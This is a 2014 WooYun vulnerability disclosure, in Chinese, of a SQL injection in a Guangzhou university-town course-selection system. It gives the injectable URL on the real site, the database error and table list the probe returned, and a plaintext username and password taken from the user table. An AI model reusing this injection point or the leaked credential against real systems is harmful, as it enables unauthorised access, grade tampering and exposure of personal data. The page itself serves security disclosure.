当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055007

漏洞标题:广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息泄漏[可改成绩]

相关厂商:scnu.edu.cn

漏洞作者: IT P民

提交时间:2014-03-30 13:44

修复时间:2014-05-14 13:44

公开时间:2014-05-14 13:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-30: 细节已通知厂商并且等待厂商处理中
2014-03-31: 厂商已经确认,细节仅向厂商公开
2014-04-10: 细节向核心白帽子及相关领域专家公开
2014-04-20: 细节向普通白帽子公开
2014-04-30: 细节向实习白帽子公开
2014-05-14: 细节向公众公开

简要描述:

某处过滤不当导致的sql注入,学分刷起来!

详细说明:

访问:
http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27
错误信息:

mySQL 查询错误: SELECT Zhy.DepartID, Zhy.Zhy_Code, Department.Depart_coll, Department.Depart_major  FROM Zhy , Department WHERE Zhy.DepartID = Department.DepartID  AND Department.Depart_coll ='广东外语外贸大学%''
mySQL 发生错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''广东外语外贸大学%''' at line 1
mySQL 错误代码: 1064
时间: Sunday 30th 2014f March 2014 11:34:48 AM


刷一下表结构

[18 tables]
+---------------------------------------+
| News |
| user |
| course |
| course_recepter |
| course_resourse |
| coursevaild |
| department |
| error |
| excellentcourse |
| majorcode |
| mcteachplan |
| mcteachplanarrangement |
| noteinfo |
| receive |
| selcourse |
| studentinfo |
| systemrecord |
| zhy |
+---------------------------------------+


首页就有登陆入口,整一条user记录,登陆一下
lihh pwd:lihh
如图:

QQ20140330-26.jpg

漏洞证明:

首页就有登陆入口,整一条user记录,登陆一下
lihh pwd:lihh
如图:

QQ20140330-26.jpg

修复方案:

版权声明:转载请注明来源 IT P民@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-03-31 18:02

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现,典型的SQL注射漏洞,能被进一步利用,危害性较大.
影响的数据:中
攻击成本:低
造成影响:中
综合评级为:中,rank:8
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-30 16:01 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    这个我之前做过检查,他们还没修补,晕